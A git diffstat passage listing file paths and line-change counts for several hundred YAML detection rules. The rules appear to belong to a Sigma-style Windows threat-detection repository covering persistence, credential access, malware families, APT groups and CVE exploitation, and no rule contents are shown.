.../registry_set_disable_uac_registry.yml | 4 +- ...y_set_disable_windows_defender_service.yml | 5 +- .../registry_set_disable_winevt_logging.yml | 19 +- ...it_guard_net_protection_on_ms_defender.yml | 3 +- ...t_disabled_microsoft_defender_eventlog.yml | 9 +- ...amper_protection_on_microsoft_defender.yml | 4 +- .../registry_set_disallowrun_execution.yml | 3 +- ...sk_cleanup_handler_autorun_persistence.yml | 19 +- .../registry_set_dns_over_https_enabled.yml | 13 +- ...gistry_set_dns_server_level_plugin_dll.yml | 12 +- .../registry_set_dot_net_etw_tamper.yml | 6 +- ...et_enabling_cor_profiler_env_variables.yml | 3 +- .../registry_set_enabling_turnoffcheck.yml | 3 +- .../registry_set_evtx_file_key_tamper.yml | 4 +- ...ry_set_exploit_guard_susp_allowed_apps.yml | 7 +- .../registry_set_fax_change_service_user.yml | 3 +- .../registry_set_fax_dll_persistance.yml | 2 +- .../registry_set_file_association_exefile.yml | 3 +- ...egistry_set_hangs_debugger_persistence.yml | 3 +- .../registry_set_hhctrl_persistence.yml | 3 +- .../registry_set/registry_set_hide_file.yml | 3 +- .../registry_set_hide_function_user.yml | 3 +- ...t_hide_scheduled_task_via_index_tamper.yml | 18 +- ...urity_zone_protocol_defaults_downgrade.yml | 12 +- ...registry_set_ime_non_default_extension.yml | 23 +- .../registry_set_ime_suspicious_paths.yml | 38 +- ...stry_set_install_root_or_ca_certificat.yml | 3 +- ...t_explorer_disable_first_run_customize.yml | 14 +- .../registry_set_legalnotice_susp_message.yml | 4 +- ...y_set_lolbin_onedrivestandaloneupdater.yml | 10 +- ...egistry_set_lsa_disablerestrictedadmin.yml | 18 +- .../registry_set_lsass_usermode_dumping.yml | 6 +- .../registry_set/registry_set_mal_adwind.yml | 4 +- .../registry_set_mal_blue_mockingbird.yml | 4 +- ...istry_set_net_cli_ngenassemblyusagelog.yml | 15 +- ...tsh_help_dll_persistence_susp_location.yml | 39 +- ...netsh_helper_dll_potential_persistence.yml | 15 +- ...registry_set_new_application_appcompat.yml | 6 +- .../registry_set_new_network_provider.yml | 8 +- .../registry_set_odbc_driver_registered.yml | 3 +- ...gistry_set_odbc_driver_registered_susp.yml | 3 +- ...registry_set_office_access_vbom_tamper.yml | 8 +- ...office_disable_protected_view_features.yml | 15 +- .../registry_set_office_enable_dde.yml | 3 +- ...ook_enable_load_macro_provider_on_boot.yml | 3 +- ..._office_outlook_enable_macro_execution.yml | 5 +- ...utlook_enable_unsafe_client_mail_rules.yml | 11 +- ...y_set_office_outlook_security_settings.yml | 4 +- ..._set_office_trust_record_susp_location.yml | 8 +- ...y_set_office_trusted_location_uncommon.yml | 14 +- ...egistry_set_office_vba_warnings_tamper.yml | 7 +- ...ce_app_cpmpat_layer_registerapprestart.yml | 11 +- .../registry_set_persistence_app_paths.yml | 19 +- .../registry_set_persistence_autodial_dll.yml | 3 +- .../registry_set_persistence_chm.yml | 3 +- ...rsistence_com_hijacking_susp_locations.yml | 13 +- ..._persistence_comhijack_psfactorybuffer.yml | 3 +- ...et_persistence_custom_protocol_handler.yml | 15 +- ...et_persistence_event_viewer_events_asp.yml | 9 +- .../registry_set_persistence_globalflags.yml | 7 +- .../registry_set_persistence_ie.yml | 9 +- .../registry_set_persistence_ifilter.yml | 66 +- ...registry_set_persistence_lsa_extension.yml | 10 +- .../registry_set_persistence_mpnotify.yml | 6 +- .../registry_set_persistence_mycomputer.yml | 7 +- ...istry_set_persistence_natural_language.yml | 8 +- .../registry_set_persistence_office_vsto.yml | 6 +- ...stry_set_persistence_outlook_todaypage.yml | 7 +- ...gistry_set_persistence_reflectdebugger.yml | 9 +- .../registry_set_persistence_scrobj_dll.yml | 3 +- .../registry_set_persistence_search_order.yml | 9 +- ...registry_set_persistence_shim_database.yml | 11 +- ...istence_shim_database_susp_application.yml | 4 +- ...stence_shim_database_uncommon_location.yml | 3 +- .../registry_set_persistence_typed_paths.yml | 4 +- .../registry_set_persistence_xll.yml | 3 +- ...istry_set_policies_associations_tamper.yml | 5 +- ...gistry_set_policies_attachments_tamper.yml | 9 +- ...y_set_powershell_enablescripts_enabled.yml | 7 +- ...gistry_set_powershell_execution_policy.yml | 19 +- .../registry_set_powershell_in_run_keys.yml | 2 +- ...gistry_set_powershell_logging_disabled.yml | 8 +- ...egistry_set_provisioning_command_abuse.yml | 18 +- ...set_renamed_sysinternals_eula_accepted.yml | 16 +- .../registry_set_rpcrt4_etw_tamper.yml | 8 +- ...stry_set_scr_file_executed_by_rundll32.yml | 3 +- .../registry_set_servicedll_hijack.yml | 3 +- .../registry_set_services_etw_tamper.yml | 5 +- .../registry_set_set_nopolicies_user.yml | 3 +- .../registry_set_sip_persistence.yml | 4 +- .../registry_set_sophos_av_tamper.yml | 3 +- .../registry_set_special_accounts.yml | 10 +- ...ry_set_suppress_defender_notifications.yml | 3 +- ...registry_set_susp_keyboard_layout_load.yml | 16 +- ...y_set_susp_pendingfilerenameoperations.yml | 6 +- .../registry_set_susp_printer_driver.yml | 6 +- ...stry_set_susp_reg_persist_explorer_run.yml | 3 +- .../registry_set_susp_run_key_img_folder.yml | 31 +- .../registry_set_susp_service_installed.yml | 15 +- .../registry_set_susp_user_shell_folders.yml | 9 +- .../registry_set_suspicious_env_variables.yml | 73 +- .../registry_set_system_lsa_nolmhash.yml | 14 +- .../registry_set_taskcache_entry.yml | 11 +- .../registry_set_telemetry_persistence.yml | 25 +- ...egistry_set_terminal_server_suspicious.yml | 35 +- ...registry_set_terminal_server_tampering.yml | 59 +- .../registry_set_timeproviders_dllname.yml | 10 +- ...y_set_tls_protocol_old_version_enabled.yml | 3 +- .../registry_set_treatas_persistence.yml | 4 + .../registry_set_turn_on_dev_features.yml | 8 +- .../registry_set_uac_bypass_sdclt.yml | 3 +- .../registry_set_uac_bypass_winsat.yml | 3 +- .../registry_set_uac_bypass_wmp.yml | 6 +- .../registry_set_vbs_payload_stored.yml | 3 +- .../registry_set_wab_dllpath_reg_change.yml | 3 +- ..._set_wdigest_enable_uselogoncredential.yml | 4 +- .../registry_set_windows_defender_tamper.yml | 14 +- ...ry_set_winget_admin_settings_tampering.yml | 6 +- ...istry_set_winget_enable_local_manifest.yml | 7 +- ...set_winlogon_allow_multiple_tssessions.yml | 10 +- .../registry_set_winlogon_notify_key.yml | 10 +- .../sysmon/sysmon_config_modification.yml | 7 +- .../sysmon_config_modification_error.yml | 3 +- .../sysmon_config_modification_status.yml | 3 +- .../sysmon/sysmon_file_block_executable.yml | 5 +- .../sysmon/sysmon_file_block_shredding.yml | 5 +- .../sysmon_file_executable_detected.yml | 5 +- ...e_remote_thread_win_powershell_generic.yml | 7 +- .../file_delete_win_zone_identifier_ads.yml | 8 +- .../file_event_win_dump_file_creation.yml | 4 +- .../file_event_win_susp_binary_dropper.yml | 38 +- ...ile_event_win_vscode_tunnel_indicators.yml | 7 +- ...file_event_win_webdav_tmpfile_creation.yml | 3 +- .../image_load_dll_amsi_uncommon_process.yml | 5 +- .../image_load_dll_system_drawing_load.yml | 7 +- .../image_load_office_excel_xll_load.yml | 3 +- ...net_connection_win_dfsvc_suspicious_ip.yml | 17 +- ...eated_sysinternals_psexec_default_pipe.yml | 11 +- ...roc_access_win_lsass_powershell_access.yml | 11 +- ...c_access_win_lsass_susp_source_process.yml | 10 +- ..._access_win_lsass_uncommon_access_flag.yml | 15 +- .../proc_creation_win_csc_compilation.yml | 12 +- .../proc_creation_win_curl_download.yml | 19 +- .../proc_creation_win_curl_execution.yml | 11 +- .../proc_creation_win_curl_fileupload.yml | 21 +- .../proc_creation_win_curl_useragent.yml | 6 +- ...roc_creation_win_dfsvc_child_processes.yml | 6 +- ..._creation_win_diskshadow_child_process.yml | 20 +- ...oc_creation_win_diskshadow_script_mode.yml | 29 +- ...oc_creation_win_findstr_password_recon.yml | 27 +- .../proc_creation_win_net_quic.yml | 21 +- ...roc_creation_win_office_svchost_parent.yml | 11 +- ...n_powershell_abnormal_commandline_size.yml | 21 +- ...eation_win_powershell_crypto_namespace.yml | 30 +- ..._creation_win_powershell_import_module.yml | 22 +- ...on_win_regsvr32_dllregisterserver_exec.yml | 48 +- ...reation_win_rundll32_dllregisterserver.yml | 25 +- ...c_creation_win_susp_compression_params.yml | 5 +- ...reation_win_susp_elevated_system_shell.yml | 29 +- ...proc_creation_win_susp_event_log_query.yml | 30 +- ...win_susp_file_permission_modifications.yml | 24 +- .../proc_creation_win_taskkill_execution.yml | 20 +- ...oc_creation_win_wmic_recon_system_info.yml | 28 +- .../registry_set_office_trusted_location.yml | 11 +- ...gistry_set_powershell_crypto_namespace.yml | 16 +- .../dns_query_win_possible_dns_rebinding.yml | 7 +- ...load_invoke_obfuscation_clip+_services.yml | 6 +- ...ke_obfuscation_obfuscated_iex_services.yml | 21 +- ...oad_invoke_obfuscation_stdin+_services.yml | 6 +- ..._load_invoke_obfuscation_var+_services.yml | 7 +- ...voke_obfuscation_via_compress_services.yml | 6 +- ...invoke_obfuscation_via_rundll_services.yml | 6 +- ..._invoke_obfuscation_via_stdin_services.yml | 6 +- ...voke_obfuscation_via_use_clip_services.yml | 6 +- ...oke_obfuscation_via_use_mshta_services.yml | 6 +- ..._obfuscation_via_use_rundll32_services.yml | 6 +- ..._invoke_obfuscation_via_var++_services.yml | 8 +- ...tstrike_getsystem_service_installation.yml | 49 +- .../driver_load_tap_driver_installation.yml | 7 +- ...ript_creation_by_office_using_file_ext.yml | 5 +- ..._correlation_apt_silence_downloader_v3.yml | 7 +- ..._correlation_apt_turla_commands_medium.yml | 6 +- ...tion_dnscat2_powershell_implementation.yml | 6 +- ...tion_win_correlation_multiple_susp_cli.yml | 5 +- ...orrelation_susp_builtin_commands_recon.yml | 44 +- ...d_cmd_and_powershell_spawned_processes.yml | 10 +- .../sysmon_non_priv_program_files_move.yml | 3 +- ..._party_drivers_exploits_token_stealing.yml | 7 +- ...ivilege_escalation_using_rotten_potato.yml | 14 +- ...uspicious_werfault_connection_outbound.yml | 9 +- .../wmi_event/sysmon_wmi_susp_scripting.yml | 35 +- .../Other/win_av_relevant_match.yml | 106 + .../win_application_msmpeng_crash_error.yml | 35 + ...in_werfault_susp_lsass_credential_dump.yml | 29 + .../esent/win_esent_ntdsutil_abuse.yml | 32 + ...win_esent_ntdsutil_abuse_susp_location.yml | 38 + .../win_audit_cve.yml | 45 + .../win_susp_backup_delete.yml | 27 + ...in_software_restriction_policies_block.yml | 31 + .../win_builtin_remove_application.yml | 27 + .../win_msi_install_from_susp_locations.yml | 41 + .../msiinstaller/win_msi_install_from_web.yml | 31 + .../win_software_atera_rmm_agent_install.yml | 26 + .../win_mssql_add_sysadmin_account.yml | 29 + .../win_mssql_disable_audit_settings.yml | 31 + .../mssqlserver/win_mssql_failed_logon.yml | 30 + ...sql_failed_logon_from_external_network.yml | 52 + .../win_mssql_sp_procoption_set.yml | 30 + .../win_mssql_xp_cmdshell_audit_log.yml | 31 + .../win_mssql_xp_cmdshell_change.yml | 28 + ...ccess_tools_screenconnect_command_exec.yml | 30 + ...cess_tools_screenconnect_file_transfer.yml | 30 + .../win_application_msmpeng_crash_wer.yml | 32 + ..._applocker_file_was_not_allowed_to_run.yml | 49 + ...time_sysinternals_tools_appx_execution.yml | 31 + ..._appxdeployment_server_applocker_block.yml | 24 + ...n_appxdeployment_server_mal_appx_names.yml | 31 + ...win_appxdeployment_server_policy_block.yml | 28 + ..._server_susp_appx_package_installation.yml | 27 + ...win_appxdeployment_server_susp_domains.yml | 52 + ...ployment_server_susp_package_locations.yml | 40 + ...ment_server_uncommon_package_locations.yml | 40 + ...n_appxpackaging_om_sups_appx_signature.yml | 27 + .../win_bits_client_new_job_via_bitsadmin.yml | 27 + ...win_bits_client_new_job_via_powershell.yml | 29 + ...nt_new_transfer_saving_susp_extensions.yml | 41 + ..._new_transfer_via_file_sharing_domains.yml | 53 + ...its_client_new_transfer_via_ip_address.yml | 78 + ...s_client_new_transfer_via_uncommon_tld.yml | 33 + ..._client_new_trasnfer_susp_local_folder.yml | 31 + ..._capi2_acquire_certificate_private_key.yml | 25 + .../category/antivirus/av_exploiting.yml | 69 + .../category/antivirus/av_hacktool.yml | 86 + .../category/antivirus/av_password_dumper.yml | 63 + .../category/antivirus/av_ransomware.yml | 61 + .../category/antivirus/av_relevant_files.yml | 99 + .../category/antivirus/av_webshell.yml | 103 + ...sclient_lifecycle_system_cert_exported.yml | 24 + .../win_codeintegrity_attempted_dll_load.yml | 106 + ...tegrity_blocked_protected_process_file.yml | 25 + ...in_codeintegrity_enforced_policy_block.yml | 27 + ...n_codeintegrity_revoked_driver_blocked.yml | 26 + ...in_codeintegrity_revoked_driver_loaded.yml | 27 + ...in_codeintegrity_revoked_image_blocked.yml | 25 + ...win_codeintegrity_revoked_image_loaded.yml | 27 + ...n_codeintegrity_unsigned_driver_loaded.yml | 25 + ...in_codeintegrity_unsigned_image_loaded.yml | 25 + .../win_codeintegrity_whql_failure.yml | 32 + .../builtin/deprecated/posh_pm_powercat.yml | 33 + .../posh_ps_access_to_chrome_login_data.yml | 38 + .../posh_ps_azurehound_commands.yml | 36 + .../posh_ps_cl_invocation_lolscript.yml | 32 + .../posh_ps_cl_mutexverifiers_lolscript.yml | 32 + .../posh_ps_file_and_directory_discovery.yml | 37 + .../deprecated/posh_ps_invoke_nightmare.yml | 29 + .../builtin/deprecated/posh_ps_susp_gwmi.yml | 37 + .../powershell_suspicious_download.yml | 28 + ...wershell_suspicious_invocation_generic.yml | 33 + ...ershell_suspicious_invocation_specific.yml | 72 + ...owershell_syncappvpublishingserver_exe.yml | 30 + ...proc_creation_win_apt_apt29_thinktanks.yml | 32 + .../proc_creation_win_apt_dragonfly.yml | 30 + .../proc_creation_win_apt_gallium.yml | 36 + .../proc_creation_win_apt_hurricane_panda.yml | 31 + ...reation_win_apt_lazarus_activity_apr21.yml | 35 + .../proc_creation_win_apt_lazarus_loader.yml | 46 + ..._creation_win_apt_muddywater_dnstunnel.yml | 31 + .../proc_creation_win_apt_ta505_dropper.yml | 30 + ...c_creation_win_certutil_susp_execution.yml | 57 + .../proc_creation_win_cmd_read_contents.yml | 36 + ...oc_creation_win_cmd_redirect_to_stream.yml | 31 + ...tial_acquisition_registry_hive_dumping.yml | 35 + .../proc_creation_win_cscript_vbs.yml | 33 + ...ion_mssql_xp_cmdshell_stored_procedure.yml | 34 + .../proc_creation_win_indirect_cmd.yml | 35 + ...in_indirect_command_execution_forfiles.yml | 47 + ...tion_win_invoke_obfuscation_via_rundll.yml | 32 + ...in_invoke_obfuscation_via_use_rundll32.yml | 37 + ...eation_win_lolbas_execution_of_wuauclt.yml | 36 + .../proc_creation_win_lolbin_findstr.yml | 49 + .../proc_creation_win_lolbin_office.yml | 33 + .../proc_creation_win_lolbin_rdrleakdiag.yml | 33 + ...ion_win_lolbins_by_office_applications.yml | 53 + .../deprecated/proc_creation_win_mal_ryuk.yml | 37 + ...on_win_malware_trickbot_recon_activity.yml | 32 + .../proc_creation_win_mavinject_proc_inj.yml | 28 + .../proc_creation_win_msdt_diagcab.yml | 33 + ...proc_creation_win_new_service_creation.yml | 34 + ...tion_win_nslookup_pwsh_download_cradle.yml | 27 + .../proc_creation_win_odbcconf_susp_exec.yml | 42 + ..._from_proxy_executing_regsvr32_payload.yml | 51 + ...from_proxy_executing_regsvr32_payload2.yml | 53 + ...on_win_office_spawning_wmi_commandline.yml | 41 + ...creation_win_possible_applocker_bypass.yml | 42 + ...n_powershell_amsi_bypass_pattern_nov22.yml | 34 + ..._powershell_base64_invoke_susp_cmdlets.yml | 45 + ...n_powershell_base64_listing_shadowcopy.yml | 35 + ...eation_win_powershell_base64_shellcode.yml | 28 + .../proc_creation_win_powershell_bitsjob.yml | 35 + ...on_win_powershell_service_modification.yml | 44 + ...ion_win_powershell_xor_encoded_command.yml | 40 + .../proc_creation_win_reg_dump_sam.yml | 34 + .../proc_creation_win_regsvr32_anomalies.yml | 90 + .../proc_creation_win_renamed_paexec.yml | 43 + ...reation_win_root_certificate_installed.yml | 37 + .../proc_creation_win_run_from_zip.yml | 26 + ...roc_creation_win_sc_delete_av_services.yml | 123 + .../proc_creation_win_schtasks_user_temp.yml | 34 + .../proc_creation_win_service_stop.yml | 49 + .../proc_creation_win_susp_bitstransfer.yml | 33 + ...eation_win_susp_cmd_exectution_via_wmi.yml | 32 + ...oc_creation_win_susp_commandline_chars.yml | 36 + ...c_creation_win_susp_lolbin_non_c_drive.yml | 45 + .../proc_creation_win_susp_run_folder.yml | 40 + ...proc_creation_win_susp_squirrel_lolbin.yml | 86 + ..._sysinternals_psexec_service_execution.yml | 42 + ...eation_win_sysinternals_psexesvc_start.yml | 25 + .../proc_creation_win_whoami_as_system.yml | 32 + .../proc_creation_win_winword_dll_load.yml | 29 + ..._win_wmic_execution_via_office_process.yml | 41 + .../proc_creation_win_wmic_remote_command.yml | 34 + .../proc_creation_win_wmic_remote_service.yml | 36 + .../proc_creation_win_wuauclt_execution.yml | 38 + ..._creation_syncappvpublishingserver_exe.yml | 26 + ...add_sysinternals_sdelete_registry_keys.yml | 28 + ...istry_event_asep_reg_keys_modification.yml | 208 + ...sing_windows_telemetry_for_persistence.yml | 50 + .../registry_set_add_hidden_user.yml | 28 + ...ble_microsoft_office_security_features.yml | 40 + .../registry_set_office_security.yml | 31 + .../registry_set_silentprocessexit.yml | 28 + .../deprecated/sysmon_rclone_execution.yml | 50 + .../deprecated/win_defender_disabled.yml | 31 + .../win_dsquery_domain_trust_discovery.yml | 31 + .../win_lateral_movement_condrv.yml | 31 + .../win_security_event_log_cleared.yml | 30 + ...in_security_group_modification_logging.yml | 69 + ...in_security_lolbas_execution_of_nltest.yml | 34 + .../deprecated/win_susp_esentutl_activity.yml | 34 + .../win_susp_vssadmin_ntds_activity.yml | 42 + ..._service_install_susp_double_ampersand.yml | 27 + ...diagnosis_scripted_load_remote_diagcab.yml | 25 + .../win_dns_client__mal_cobaltstrike.yml | 35 + .../win_dns_client_anonymfiles_com.yml | 29 + .../dns_client/win_dns_client_mega_nz.yml | 29 + .../dns_client/win_dns_client_tor_onion.yml | 29 + .../dns_client/win_dns_client_ufile_io.yml | 30 + ...in_dns_server_failed_dns_zone_transfer.yml | 24 + ...ns_server_susp_server_level_plugin_dll.yml | 35 + .../win_usb_device_plugged.yml | 30 + .../Axiom/proc_creation_win_apt_zxshell.yml | 38 + ...eation_win_apt_turla_commands_critical.yml | 36 + ...oc_creation_win_apt_turla_comrat_may20.yml | 37 + ...roc_creation_win_exploit_cve_2015_1641.yml | 30 + ...roc_creation_win_exploit_cve_2017_0261.yml | 32 + ...oc_creation_win_exploit_cve_2017_11882.yml | 34 + ...roc_creation_win_exploit_cve_2017_8759.yml | 33 + .../proc_creation_win_malware_adwind.yml | 34 + .../proc_creation_win_malware_fireball.yml | 34 + .../proc_creation_win_malware_notpetya.yml | 42 + ...n_win_malware_plugx_susp_exe_locations.yml | 101 + .../StoneDrill/win_system_apt_stonedrill.yml | 30 + .../proc_creation_win_malware_wannacry.yml | 68 + ...oc_creation_win_apt_apt10_cloud_hopper.yml | 33 + .../proc_creation_win_apt_ta17_293a_ps.yml | 31 + ...on_win_apt_lazarus_binary_masquerading.yml | 33 + .../win_system_apt_carbonpaper_turla.yml | 32 + .../win_system_apt_turla_service_png.yml | 29 + .../proc_creation_win_malware_elise.yml | 41 + ..._creation_win_apt_apt27_emissary_panda.yml | 35 + .../TA/APT28/proc_creation_win_apt_sofacy.yml | 44 + ...apt_apt29_phishing_campaign_indicators.yml | 35 + ...c_creation_win_apt_muddywater_activity.yml | 44 + .../proc_creation_win_apt_oilrig_mar18.yml | 56 + .../OilRig/win_security_apt_oilrig_mar18.yml | 43 + .../TA/OilRig/win_system_apt_oilrig_mar18.yml | 44 + .../proc_creation_win_apt_slingshot.yml | 34 + .../Slingshot/win_security_apt_slingshot.yml | 32 + .../proc_creation_win_apt_tropictrooper.yml | 25 + ...roc_creation_win_exploit_other_bearlpe.yml | 35 + ...roc_creation_win_exploit_cve_2019_1388.yml | 37 + .../proc_creation_win_malware_babyshark.yml | 38 + .../proc_creation_win_malware_dridex.yml | 55 + .../proc_creation_win_malware_dtrack.yml | 44 + .../proc_creation_win_malware_emotet.yml | 51 + .../proc_creation_win_malware_formbook.yml | 57 + ...tion_win_malware_lockergoga_ransomware.yml | 29 + .../QBot/proc_creation_win_malware_qbot.yml | 39 + .../Ryuk/proc_creation_win_malware_ryuk.yml | 56 + ...creation_win_malware_snatch_ransomware.yml | 33 + ...c_creation_win_apt_aptc12_bluemushroom.yml | 31 + ...creation_win_apt_apt31_judgement_panda.yml | 42 + ...c_creation_win_apt_bear_activity_gtr19.yml | 35 + .../proc_creation_win_apt_empiremonkey.yml | 30 + ...ation_win_apt_equationgroup_dll_u_load.yml | 32 + .../proc_creation_win_apt_mustangpanda.yml | 40 + .../proc_creation_win_apt_wocao.yml | 48 + .../win_security_apt_wocao.yml | 36 + .../CVE-2020-0688/win_vul_cve_2020_0688.yml | 32 + ...oc_creation_win_exploit_cve_2020_10189.yml | 43 + ...roc_creation_win_exploit_cve_2020_1048.yml | 36 + ...roc_creation_win_exploit_cve_2020_1350.yml | 37 + ..._creation_win_malware_blue_mockingbird.yml | 37 + ..._win_malware_emotet_rundll32_execution.yml | 41 + ...creation_win_malware_ke3chang_tidepool.yml | 37 + ...c_creation_win_malware_maze_ransomware.yml | 46 + .../proc_creation_win_apt_evilnum_jul20.yml | 33 + .../proc_creation_win_apt_gallium_iocs.yml | 110 + .../GALLIUM/win_dns_analytic_apt_gallium.yml | 40 + .../proc_creation_win_apt_greenbug_may20.yml | 56 + ...reation_win_apt_lazarus_group_activity.yml | 64 + .../proc_creation_win_apt_unc2452_cmds.yml | 60 + .../proc_creation_win_apt_unc2452_ps.yml | 37 + ...ation_win_apt_unc2452_vbscript_pattern.yml | 34 + .../proc_creation_win_apt_taidoor.yml | 33 + ...c_creation_win_apt_winnti_mal_hk_jan20.yml | 42 + .../proc_creation_win_apt_winnti_pipemon.yml | 34 + .../av_printernightmare_cve_2021_34527.yml | 45 + ...win_exploit_cve_2021_1675_printspooler.yml | 47 + ...cve_2021_1675_printspooler_operational.yml | 34 + ...it_cve_2021_1675_printspooler_security.yml | 32 + ...it_cve_2021_26084_atlassian_confluence.yml | 46 + ..._win_exploit_cve_2021_26857_msexchange.yml | 32 + ...ation_win_exploit_cve_2021_35211_servu.yml | 35 + ...oc_creation_win_exploit_cve_2021_40444.yml | 38 + ..._2021_40444_office_directory_traversal.yml | 41 + ...oc_creation_win_exploit_cve_2021_41379.yml | 41 + .../CVE-2021-41379/win_vul_cve_2021_41379.yml | 29 + .../win_system_exploit_cve_2021_42278.yml | 40 + ...samaccountname_spoofing_cve_2021_42287.yml | 35 + ...n_win_exploit_other_razorinstaller_lpe.yml | 31 + ...tion_win_exploit_other_systemnightmare.yml | 30 + ...cve_2021_31979_cve_2021_33771_exploits.yml | 38 + .../Exploits/win_exchange_cve_2021_42321.yml | 32 + ...ation_win_malware_blackbyte_ransomware.yml | 39 + .../Conti/proc_creation_win_malware_conti.yml | 33 + .../proc_creation_win_malware_conti_7zip.yml | 30 + ..._win_malware_conti_ransomware_commands.yml | 35 + ...malware_conti_ransomware_database_dump.yml | 39 + ...eation_win_malware_darkside_ransomware.yml | 34 + ...win_malware_devil_bait_output_redirect.yml | 43 + ...win_malware_goofy_guineapig_broken_cmd.yml | 25 + ...g_googleupdate_uncommon_child_instance.yml | 31 + ...re_goofy_guineapig_service_persistence.yml | 30 + ...creation_win_malware_pingback_backdoor.yml | 38 + ...eation_win_malware_small_sieve_cli_arg.yml | 26 + ...y_set_malware_small_sieve_evasion_typo.yml | 29 + .../HAFNIUM/proc_creation_win_apt_hafnium.yml | 81 + .../proc_creation_win_apt_revil_kaseya.yml | 50 + .../proc_creation_win_apt_sourgrum.yml | 44 + ...win_exploit_cve_2023_21554_queuejumper.yml | 39 + ...eation_win_exploit_cve_2022_29072_7zip.yml | 41 + ..._win_exploit_cve_2022_41120_sysmon_eop.yml | 44 + ...re_bluesky_ransomware_files_indicators.yml | 35 + ...on_win_malware_hermetic_wiper_activity.yml | 36 + ...raspberry_robin_single_dot_ending_file.yml | 29 + .../2022/Malware/win_mssql_sp_maggie.yml | 28 + ..._creation_win_apt_actinium_persistence.yml | 32 + .../MERCURY/proc_creation_win_apt_mercury.yml | 30 + ...023_22518_confluence_tomcat_child_proc.yml | 47 + ...ve_2023_23397_outlook_reminder_trigger.yml | 33 + ...e_2023_23397_outlook_remote_file_query.yml | 39 + ...oit_cve_2023_23397_outlook_remote_file.yml | 53 + ..._windows_html_rce_share_access_pattern.yml | 32 + ...ploit_cve_2023_38831_winrar_child_proc.yml | 46 + ...on_exploit_cve_2023_40477_winrar_crash.yml | 37 + .../Exploits/win_msmq_corrupted_packet.yml | 26 + ...in_malware_coldsteel_anonymous_process.yml | 29 + ..._malware_coldsteel_service_persistence.yml | 30 + ...ry_set_malware_coldsteel_created_users.yml | 31 + ..._malware_coldsteel_persistence_service.yml | 31 + ..._autoit3_from_susp_parent_and_location.yml | 41 + ...win_malware_darkgate_net_user_creation.yml | 35 + ..._creation_win_malware_griffon_patterns.yml | 28 + ...ware_icedid_rundll32_dllregisterserver.yml | 30 + ...re_pikabot_combined_commands_execution.yml | 48 + ...win_malware_pikabot_rundll32_discovery.yml | 36 + ...win_malware_pikabot_rundll32_hollowing.yml | 37 + ...n_malware_qakbot_regsvr32_calc_pattern.yml | 30 + ..._win_malware_qakbot_rundll32_execution.yml | 43 + ...on_win_malware_qakbot_rundll32_exports.yml | 71 + ...are_qakbot_rundll32_fake_dll_execution.yml | 43 + ...win_malware_qakbot_uninstaller_cleanup.yml | 34 + ...alware_rhadamanthys_stealer_dll_launch.yml | 35 + ..._malware_rorschach_ransomware_activity.yml | 36 + ...n_win_malware_snake_installer_cli_args.yml | 29 + ...ation_win_malware_snake_installer_exec.yml | 37 + ...on_win_malware_snake_service_execution.yml | 27 + ...y_event_malware_snake_covert_store_key.yml | 23 + ...gistry_set_malware_snake_encrypted_key.yml | 29 + ...stem_malware_snake_persistence_service.yml | 28 + ...n_win_malware_3cx_compromise_execution.yml | 104 + ...n_malware_3cx_compromise_susp_children.yml | 52 + ...win_malware_3cx_compromise_susp_update.yml | 47 + ...ity_apt_cozy_bear_scheduled_tasks_name.yml | 50 + ..._cozy_bear_graphical_proton_task_names.yml | 51 + ...ation_win_apt_diamond_sleet_indicators.yml | 25 + ...event_apt_diamond_sleet_scheduled_task.yml | 29 + ...urity_apt_diamond_sleet_scheduled_task.yml | 31 + .../TA/FIN7/posh_ps_apt_fin7_powerhold.yml | 34 + .../posh_ps_apt_fin7_powertrash_execution.yml | 36 + ...n_apt_fin7_powertrash_lateral_movement.yml | 34 + ...posh_ps_apt_lace_tempest_eraser_script.yml | 36 + ...h_ps_apt_lace_tempest_malware_launcher.yml | 35 + ...pt_lace_tempest_cobalt_strike_download.yml | 27 + ..._win_apt_lace_tempest_loader_execution.yml | 27 + ...storm_aspera_faspex_susp_child_process.yml | 120 + ...int_sandstorm_log4j_wstomcat_execution.yml | 28 + ...storm_manage_engine_susp_child_process.yml | 127 + ...ation_win_apt_mustang_panda_indicators.yml | 34 + ...int_management_exploitation_indicators.yml | 39 + ...t_print_management_exploitation_pc_app.yml | 45 + ...ion_win_apt_peach_sandstorm_indicators.yml | 26 + .../firewall_as/win_firewall_as_add_rule.yml | 41 + .../win_firewall_as_add_rule_susp_folder.yml | 46 + .../win_firewall_as_change_rule.yml | 29 + .../win_firewall_as_delete_all_rules.yml | 34 + .../win_firewall_as_delete_rule.yml | 38 + .../win_firewall_as_failed_load_gpo.yml | 23 + .../win_firewall_as_reset_config.yml | 25 + .../win_firewall_as_setting_change.yml | 29 + .../win_lsa_server_normal_user_admin.yml | 39 + .../win_exchange_proxylogon_oabvirtualdir.yml | 32 + ...ange_proxyshell_certificate_generation.yml | 34 + ...win_exchange_proxyshell_mailbox_export.yml | 35 + ...hange_proxyshell_remove_mailbox_export.yml | 28 + ...ge_set_oabvirtualdirectory_externalurl.yml | 29 + .../win_exchange_transportagent.yml | 30 + .../win_exchange_transportagent_failed.yml | 29 + .../builtin/ntlm/win_susp_ntlm_auth.yml | 28 + .../ntlm/win_susp_ntlm_brute_force.yml | 35 + .../builtin/ntlm/win_susp_ntlm_rdp.yml | 34 + ...shd_openssh_server_listening_on_socket.yml | 30 + ...on_win_userdomain_variable_enumeration.yml | 28 + ...osh_pc_abuse_nslookup_with_dns_records.yml | 35 + .../posh_pc_delete_volume_shadow_copies.yml | 32 + .../posh_pc_downgrade_attack.yml | 29 + .../posh_pc_exe_calling_ps.yml | 32 + .../powershell_classic/posh_pc_powercat.yml | 33 + .../posh_pc_remote_powershell_session.yml | 34 + .../posh_pc_remotefxvgpudisablement_abuse.yml | 34 + .../posh_pc_renamed_powershell.yml | 35 + .../posh_pc_susp_download.yml | 33 + .../posh_pc_susp_get_nettcpconnection.yml | 26 + .../posh_pc_susp_zip_compress.yml | 38 + ...posh_pc_tamper_windows_defender_set_mp.yml | 85 + ...sh_pc_wsman_com_provider_no_powershell.yml | 37 + .../posh_pc_xor_commandline.yml | 31 + ..._pm_active_directory_module_dll_import.yml | 40 + .../posh_pm_alternate_powershell_hosts.yml | 54 + .../posh_pm_bad_opsec_artifacts.yml | 43 + .../posh_pm_clear_powershell_history.yml | 47 + .../posh_pm_decompress_commands.yml | 33 + .../posh_pm_exploit_scripts.yml | 275 + .../posh_pm_get_addbaccount.yml | 32 + .../posh_pm_get_clipboard.yml | 30 + .../posh_pm_invoke_obfuscation_clip.yml | 34 + ...h_pm_invoke_obfuscation_obfuscated_iex.yml | 40 + .../posh_pm_invoke_obfuscation_stdin.yml | 34 + 